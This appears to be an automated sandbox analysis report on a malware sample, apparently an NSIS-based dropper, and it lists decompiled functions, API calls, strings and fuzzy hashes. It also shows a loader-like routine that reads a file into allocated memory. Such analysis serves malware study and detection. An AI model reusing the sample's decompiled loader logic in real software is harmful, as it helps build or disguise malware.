                                      0x004053b3
                                      0x00000000
                                      0x004053b3
                                      0x004052ca
                                      0x004052d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405290
                                      0x00405290
                                      0x00405292
                                      0x004053c3
                                      0x004053c6
                                      0x004053c9
                                      0x0040541b
                                      0x0040541b
                                      0x0040541b
                                      0x004053cb
                                      0x004053ce
                                      0x004053d9
                                      0x004053de
                                      0x004053e0
                                      0x00000000
                                      0x00000000
                                      0x004053e3
                                      0x004053e9
                                      0x004053ef
                                      0x004053f5
                                      0x004053f7
                                      0x00000000
                                      0x00405413
                                      0x004053f9
                                      0x004053fd
                                      0x00000000
                                      0x00000000
                                      0x00405402
                                      0x00405407
                                      0x00405408
                                      0x00000000
                                      0x00405409
                                      0x004053d0
                                      0x004053d0
                                      0x00000000
                                      0x004053d0
                                      0x00405298
                                      0x0040529c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040529c

                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 0040526E
                                      • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052B8
                                      • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052D9
                                      • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052DF
                                      • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004052F0
                                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                      • FindClose.KERNEL32(?), ref: 004053B3
                                      Strings
                                      • "C:\Users\user\Desktop\Y1p8VPvyU2.exe" , xrefs: 0040525A
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                                      • \*.*, xrefs: 004052B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-85063897
                                      • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                      • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                      • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                      • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100217EA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100218C4
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 100218EE
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16), ref: 10021905
                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 10021927
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731,00000000,00000000), ref: 1002199A
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731), ref: 100219A5
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,10021572,7FC6FA16,10021731,00000000), ref: 100219F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                      • String ID:
                                      • API String ID: 656311269-0
                                      • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                      • Instruction ID: 3dbdf73d719aeac6aafdfdac4e0ef6f9e424ef23ee5861aafd292a39fed29027
                                      • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                      • Instruction Fuzzy Hash: C1619F39F00208ABCB11DFA4E894BEEB7B6EF58710F604059E955EB390EB349D41CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405C49(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x4091f8);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                      0x00405c51
                                      0x00405c54
                                      0x00405c5b
                                      0x00405c63
                                      0x00405c70
                                      0x00000000
                                      0x00405c77
                                      0x00405c66
                                      0x00405c6e
                                      0x00000000
                                      0x00000000
                                      0x00405c7f

                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                      • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                      • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                      • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405C22(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c028;
			}




                                      0x00405c2d
                                      0x00405c36
                                      0x00000000
                                      0x00405c43
                                      0x00405c39
                                      0x00000000

                                      APIs
                                      • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 00405C2D
                                      • FindClose.KERNEL32(00000000), ref: 00405C39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                      • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                      • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                      • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "oryzytcrolozawnhxg Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                      0x00403813
                                      0x0040381c
                                      0x0040395d
                                      0x00403961
                                      0x00403965
                                      0x00403967
                                      0x0040396c
                                      0x00403977
                                      0x00403982
                                      0x00403987
                                      0x00403989
                                      0x0040398b
                                      0x0040398e
                                      0x00403993
                                      0x004039a1
                                      0x004039ae
                                      0x004039b5
                                      0x004039b5
                                      0x004039b6
                                      0x004039b6
                                      0x004039bb
                                      0x004039c1
                                      0x004039c8
                                      0x004039ce
                                      0x004039d0
                                      0x00403a10
                                      0x00403a15
                                      0x00403a1a
                                      0x00403a1a
                                      0x00403a1f
                                      0x00403a28
                                      0x00403a2a
                                      0x00403a2f
                                      0x00403a35
                                      0x00403a39
                                      0x00403a39
                                      0x00403a3e
                                      0x00403a44
                                      0x00000000
                                      0x00000000
                                      0x00403a4a
                                      0x00403a4f
                                      0x00403a55
                                      0x00000000
                                      0x00000000
                                      0x00403a5e
                                      0x00403a66
                                      0x00403a6b
                                      0x00403a6e
                                      0x00403a74
                                      0x00403a79
                                      0x00403a7c
                                      0x00403a82
                                      0x00403a87
                                      0x00403a8a
                                      0x00403a90
                                      0x00403a98
                                      0x00403a9e
                                      0x00403aa4
                                      0x00403aa8
                                      0x00403aaf
                                      0x00403aaf
                                      0x00403aaf
                                      0x00403ab9
                                      0x00403acb
                                      0x00403ad7
                                      0x00403adc
                                      0x00403ae6
                                      0x00403aec
                                      0x00403aee
                                      0x00403af3
                                      0x00403af0
                                      0x00403af0
                                      0x00403af0
                                      0x00403b03
                                      0x00403b1b
                                      0x00403b1d
                                      0x00403b23
                                      0x00403b38
                                      0x00403b25
                                      0x00403b2e
                                      0x00403b30
                                      0x00403b30
                                      0x00403b3e
                                      0x00403b4e
                                      0x00403b5f
                                      0x00403b66
                                      0x00403b6c
                                      0x00403b70
                                      0x00403b75
                                      0x00403b77
                                      0x00000000
                                      0x00403b7d
                                      0x00403b7d
                                      0x00403b7f
                                      0x00000000
                                      0x00000000
                                      0x00403b85
                                      0x00403b89
                                      0x00403bae
                                      0x00403bb4
                                      0x00403bba
                                      0x00403bbc
                                      0x00000000
                                      0x00000000
                                      0x00403be2
                                      0x00403be8
                                      0x00403bea
                                      0x00403bef
                                      0x00000000
                                      0x00000000
                                      0x00403bf5
                                      0x00403bf8
                                      0x00403bfb
                                      0x00403c12
                                      0x00403c1e
                                      0x00403c37
                                      0x00403c3d
                                      0x00403c41
                                      0x00403c46
                                      0x00403c4c
                                      0x00000000
                                      0x00000000
                                      0x00403c56
                                      0x00403c61
                                      0x00000000
                                      0x00403c61
                                      0x00403b8b
                                      0x00403b91
                                      0x00000000
                                      0x00000000
                                      0x00403b97
                                      0x00403b9d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403ba3
                                      0x00403b77
                                      0x00403c6e
                                      0x00403c7a
                                      0x00403c81
                                      0x00000000
                                      0x004039d2
                                      0x004039d2
                                      0x004039d5
                                      0x00403a08
                                      0x00403a08
                                      0x00403a0a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403a0a
                                      0x004039d7
                                      0x004039db
                                      0x004039e0
                                      0x004039e2
                                      0x00000000
                                      0x00000000
                                      0x004039f2
                                      0x004039fa
                                      0x00000000
                                      0x00403a00
                                      0x0040382e
                                      0x0040382e
                                      0x00403832
                                      0x00403837
                                      0x00403846
                                      0x00403846
                                      0x0040384f
                                      0x00403858
                                      0x00403863
                                      0x00403863
                                      0x0040386f
                                      0x0040388b
                                      0x0040388e
                                      0x004038a1
                                      0x004038a7
                                      0x0040394a
                                      0x00000000
                                      0x00403953
                                      0x004038ad
                                      0x004038ba
                                      0x004038bc
                                      0x004038be
                                      0x004038dd
                                      0x004038dd
                                      0x004038e0
                                      0x004038e5
                                      0x004038e8
                                      0x004038f8
                                      0x004038f9
                                      0x004038fb
                                      0x00403931
                                      0x00403944
                                      0x00000000
                                      0x00403944
                                      0x004038fd
                                      0x00403903
                                      0x0040391c
                                      0x00403921
                                      0x00403923
                                      0x00000000
                                      0x00000000
                                      0x00403925
                                      0x00403911
                                      0x00403911
                                      0x00403913
                                      0x00403913
                                      0x00000000
                                      0x00403913
                                      0x00403906
                                      0x0040390b
                                      0x00000000
                                      0x0040390b
                                      0x004038ea
                                      0x004038f0
                                      0x00000000
                                      0x00000000
                                      0x004038f2
                                      0x00000000
                                      0x004038f2
                                      0x004038e2
                                      0x00000000
                                      0x004038e2
                                      0x004038c8
                                      0x004038cf
                                      0x004038d5
                                      0x004038d7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004038d7
                                      0x00403893
                                      0x00000000
                                      0x00403871
                                      0x00403877
                                      0x00403881
                                      0x00403c87
                                      0x00403c8d
                                      0x00403c8f
                                      0x00403c95
                                      0x00403c9a
                                      0x00403ca0
                                      0x00403ca0
                                      0x00403c95
                                      0x00403caa
                                      0x00000000
                                      0x00403caa
                                      0x0040386f

                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                      • ShowWindow.USER32(?), ref: 00403863
                                      • DestroyWindow.USER32 ref: 00403877
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403893
                                      • GetDlgItem.USER32 ref: 004038B4
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                                      • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                      • GetDlgItem.USER32 ref: 0040397D
                                      • GetDlgItem.USER32 ref: 00403987
                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                                      • GetDlgItem.USER32 ref: 00403A98
                                      • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                      • EnableWindow.USER32(?,?), ref: 00403ACB
                                      • EnableWindow.USER32(?,?), ref: 00403AE6
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                      • EnableMenuItem.USER32 ref: 00403B03
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                                      • lstrlenA.KERNEL32(00429FD8,?,00429FD8,oryzytcrolozawnhxg Setup), ref: 00403B57
                                      • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                      • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                      Strings
                                      • oryzytcrolozawnhxg Setup, xrefs: 00403B48
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                      • String ID: oryzytcrolozawnhxg Setup
                                      • API String ID: 4050669955-1991326464
                                      • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                      • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                      • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                      • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403489, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213stringregistrylibraryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x720250
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
